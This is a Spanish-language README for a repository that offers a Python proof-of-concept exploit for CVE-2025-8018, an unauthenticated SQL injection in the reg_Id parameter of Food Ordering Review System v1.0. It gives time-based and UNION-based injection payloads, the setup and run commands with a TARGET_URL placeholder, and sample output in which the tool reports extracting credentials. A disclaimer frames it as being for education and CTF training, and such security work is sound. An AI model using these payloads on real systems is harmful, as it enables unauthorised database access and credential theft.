
Exploit PoC en Python para CVE-2025-8018, una inyección SQL crítica no autenticada en Food Ordering Review System v1.0. Admite extracción de datos basada en tiempo (blind) y basada en UNION para hacking ético y entrenamiento CTF.
Este repositorio proporciona un exploit de prueba de concepto (PoC) en Python para CVE‑2025‑8018, una vulnerabilidad de inyección SQL de alta gravedad descubierta en el Sistema de Revisión de Pedidos de Comida v1.0. La vulnerabilidad se desencadena a través del parámetro reg_Id en reservation_page.php.
/user/reservation_page.phpreg_Idusers, sin autenticaciónSLEEP()UNION SELECT NULL,NULL,...requestsInstalar dependencias:
pip install requests
Cómo Usar Clona el repositorio:
git clone https://github.com/drackyjr/CVE-2025-8018.git
cd CVE-2025-8018
Actualiza la URL objetivo:
Abre cve-2025-8018.py y modifica:
TARGET_URL = "http://TARGET-IP/user/reservation_page.php" Reemplaza TARGET-IP con la dirección real del sistema vulnerable.
Ejecuta el script del exploit:
python3 cve-2025-8018.py
Salida
[*] Checking time-based SQLi with payload: 1 AND SLEEP(5)--
[+] Blind SQL injection confirmed!
[*] Testing how many columns the query expects...
[+] Looks like 3 columns work!
[*] Trying to extract data using UNION-based SQL injection...
[+] Found potential credentials in the response!
[*] Trying blind extraction fallback...
[+] Username is 7 characters long!
⚠️ Aviso Legal Este PoC se proporciona estrictamente con fines educativos, como desafíos CTF, entrenamiento en ciberseguridad o pruebas de defensa en tus propios sistemas.
No utilices esto contra sistemas en producción o sistemas para los que no tengas permiso explícito para realizar pruebas. El autor y las partes asociadas no son responsables del mal uso o daños resultantes del código.